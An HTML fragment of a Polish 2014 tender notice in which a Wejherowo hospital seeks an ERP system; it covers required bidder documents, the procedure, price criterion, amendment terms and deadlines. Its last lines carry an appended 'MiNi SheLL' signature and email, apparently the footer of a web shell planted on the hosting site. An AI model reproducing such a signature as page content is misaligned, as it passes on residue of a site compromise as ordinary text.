2. Wypełniony i podpisany załącznik nr 2 do SIWZ, część A, B, C, i D  (Opis Przedmiotu Zamówienia).
3. Opinia (co najmniej 1) wystawiona nie wcześniej niż w roku 2014 przez użytkownika (szpital) oferowanego Systemu Informatycznego ERP (w zakresie przedmiotowym odpowiadającym opisowi zawartemu w załączniku nr 2, część D, pkt 4 do SIWZ) potwierdzająca co najmniej, iż oferowany System Informatyczny ERP (w zakresie obsługującym co najmniej 7 z obszarów Zaopatrzenie, Gospodarka Magazynowa, Sprzedaż, Finanse, Zarządzanie Zasobami Ludzkimi (Kadry i Płace), Księgowość i Podatki, Rachunek Kosztów, Sprawozdawczość, Budżetowanie i Controlling Analizy Ekonomiczne i Generowanie Informacji Zarządczej, Rachunek Kosztów, Budżetowanie i Controlling, Generowanie Informacji Zarządczej - wymienione z nazwy w opinii) został u niego wdrożony, jest  użytkowany oraz jest przez niego pozytywnie oceniany - (wzór opinii - załącznik nr 2, część E do SIWZ).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Upoważnienie (w oryginale lub w postaci kopii poświadczonej notarialnie) do podpisania oferty, jeśli upoważnienie do reprezentacji Wykonawcy przez osobę podpisującą ofertę nie wynika bezpośrednio z dokumentów, o których mowa w rozdziale 6 pkt 2 SIWZ.
2. Wypełniony  formularz  oferty  -  załącznik  nr 1 do SIWZ.
3. Wypełniony formularz  asortymentowo - cenowy -  załącznik nr 3 do SIWZ.
4. Dokument potwierdzający wniesienie wadium (wskazane załączenie dokumentu zgodnie z zapisem rozdz. 8 pkt 3 SIWZ).
5. Zgodnie z art. 26 ust. 2 b ustawy Prawo Zamówień Publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych  podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Pisemne zobowiązanie podmiotów udostępniających Wykonawcy swoje zasoby musi zawierać jednoznaczne zobowiązanie tych podmiotów do udostępnienia Wykonawcy zasobów na czas realizacji nn. zamówienia w celu realizacji umowy nr SZP/ZP/N/Z/28/2014 dla Szpitala Specjalistycznego im. F. Ceynowy Sp. z o.o. w Wejherowie, podpisane przez upoważnione do reprezentowania tych podmiotów osoby.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 3 projektu umowy - Sposób i terminy realizacji:
ust.6.Zamawiający wymaga, by wszelkie zastępstwa lub trwała zmiana osób wchodzących w skład Zespołu Projektowego zgłaszana była niezwłocznie przez Wykonawcę, z zastrzeżeniem, że osoba zastępująca musi posiadać nie mniejsze kwalifikacje niż osoba zastępowana. Zastępstwo lub trwała zmiana danej osoby wymaga akceptacji ze strony Zamawiającego.;
ust.7.Zamawiający zażąda zmiany osoby wchodzącej w skład Zespołu Projektowego po stronie Wykonawcy lub innej osoby biorącej udział w realizacji Umowy (wykazanej w załączniku nr 2 do Umowy - Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia), jeśli określona osoba  nie spełnia oczekiwań lub potrzeb Zamawiającego lub realizuje Umowę niezgodnie z jej zapisami lub uzgodnieniami wynikającymi z Analizy Przedwdrożeniowej lub Harmonogramem Realizacji Umowy. Wykonawca jest zobowiązany zaproponować inną osobę na to stanowisko, a po uzyskaniu akceptacji Zamawiającego, dokona jej zmiany, zgodnie z żądaniem Zamawiającego.;
ust.16.Zamawiający dopuszcza możliwość zmiany elementów Harmonogramu Realizacji Umowy pod warunkiem zachowania terminu realizacji Umowy w zakresie dostawy, instalacji, konfiguracji i wdrożenia Systemu Informatycznego oraz pisemnej zgody Zamawiającego na powyższe zmiany.;
§ 19 projektu umowy - Zmiany Umowy:
ust.1.Zamawiający dopuszcza możliwość zmiany istotnych postanowień Umowy w stosunku do treści oferty w następujących okolicznościach:   
1.1.istnieje możliwość zastosowania nowszych i korzystniejszych dla Zamawiającego rozwiązań technologicznych lub technicznych, niż te istniejące w chwili podpisania Umowy - w takim przypadku zostanie dokonana zmiana Umowy w zakresie przedmiotu nn Umowy bez zmiany jej wartości brutto,
1.2.nastąpiła zmiana producenta, producent zakończył produkcję, albo skończyła się dostępność oprogramowania zaoferowanego przez Wykonawcę i zachodzi konieczność zastąpienia oprogramowania innym - w takim przypadku Zamawiający dopuszcza dostarczenie inne niż zaoferowane w ofercie oprogramowania pod warunkiem, że jest o nie gorszych parametrach i spełnia wymagania określone przez Zamawiającego w Specyfikacji Istotnych Warunków Zamówienia bez ponoszenia przez Zamawiającego dodatkowych kosztów,
1.3.konieczność wprowadzenia zmian będzie następstwem zmian obowiązujących przepisów prawa, w zakresie spowodowanym wprowadzeniem zmian,
1.4.zmiana obowiązującej stawki VAT - przyjmuje się, że wynagrodzenie netto Wykonawcy nie ulega zmianie natomiast zostanie zmieniona stawka podatku VAT a co za tym idzie jego wartość oraz wartość Umowy brutto, 
1.5.zmiany osób wymienionych w ofercie Wykonawcy (załącznik nr 2 do nn Umowy - Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia) w ramach wykazania spełniania warunków udziału w postępowaniu o udzielenie zamówienia publicznego - Zamawiający wymaga, wykazania przez Wykonawcę,  spełnienia warunków udziału w postępowaniu czyli  spełnienia wymagań określonych w Specyfikacji Istotnych Warunków Zamówienia w postępowaniu SZP/ZP/N/Z/28/2014 dla osób, które będą uczestniczyć w wykonywaniu zamówienia, 
1.6.wystąpienia zmian w powszechnie obowiązujących przepisach prawa, w zakresie mającym wpływ na realizację przedmiotu Umowy - Umowa zostanie zmieniona w sposób dostosowujący jej brzmienie do obowiązujących w danym momencie przepisów prawa bez możliwości zmiany wartości brutto przedmiotu Umowy, z zastrzeżeniem wyjątków przewidzianych nn Umową,
1.7.siła wyższa (za siłę wyższą mogą być uznane tylko te okoliczności, które zaistniały niezależnie od woli Stron i nie występują z winy Strony powołującej się na siłę wyższą uniemożliwiająca wykonanie przedmiotu Umowy zgodnie z opisem przedmiotu zamówienia) - w takim przypadku Strona zobowiązana jest niezwłocznie powiadomić drugą Stronę o wystąpieniu siły wyższej, uniemożliwiającej realizację obowiązków wynikających z Umowy. W skutek wystąpienia powyższych okoliczności termin realizacji zamówienia może ulec przedłużeniu o czas niezbędny na właściwe jego wykonanie jednak bez zmiany wartości brutto przedmiotu Umowy i z zastrzeżeniem warunków opisanych w ust. 2 nn paragrafu,
1.8.przewidywane inne niż wymienione wyżej zmiany mają charakter korzystny dla Zamawiającego w szczególności polegają na: obniżeniu ceny, wykonaniu nieodpłatnie innych, nie przewidzianych nn Umową dodatkowych czynności przez Wykonawcę w ramach nn Umowy, przesunięciu terminu realizacji Umowy, jeśli przesunięcie wynika z potrzeb Zamawiającego np. związanych z rozliczeniem z NFZ lub harmonizacją innych okresów rozliczeniowych, czego wymaga zachowanie płynności w rozliczeniach Zamawiającego oraz inne mające charakter przysporzenia materialnego lub niematerialnego na rzecz Zamawiającego lub są związane z zachowaniem płynności w działalności Szpitala itp.
ust.2.Strony dopuszczają możliwość zmiany terminów określonych nn Umową, jeśli wystąpiły niezawinione przez Strony okoliczności powodujące konieczność wprowadzenia zmian, a zmiana terminu jest niezbędna dla prawidłowej realizacji przedmiotu Umowy i nie spowoduje ona zagrożenia dla prawidłowej realizacji nn umowy i prawidłowej pracy Szpitala. Zmiana terminu niezależnie od ust. 3 nn paragrafu, wymaga pisemnego uzasadnienia jednej Strony i pisemnej zgody drugiej Strony.
ust.3.Wszelkie zmiany postanowień Umowy, proponowane przez którąkolwiek ze Stron wymagają złożenia drugiej Stronie pisemnego wniosku zawierającego proponowaną zmianę, podstawę zmiany określoną w Umowie oraz uzasadnienie konieczności wprowadzenia przedmiotowej zmiany.
ust.4.Wszelkie zmiany postanowień Umowy mogą być dokonane pod rygorem nieważności wyłącznie w formie pisemnego aneksu podpisanego przez obie Strony po uprzednim wyrażeniu pisemnej zgody przez Zamawiającego w wyniku złożenia wniosku, o którym mowa w ust. 3 nn paragrafu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.wejherowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny im. F. Ceynowy Sp. z o.o.
ul. Jagalskiego 10
84-200 Wejherowo
Dział Zamówień Publicznych
lokal nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.06.2014 godzina 09:00, miejsce: Siedziba Zamawiającego (ul. Jagalskiego 10 84-200 Wejherowo) - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com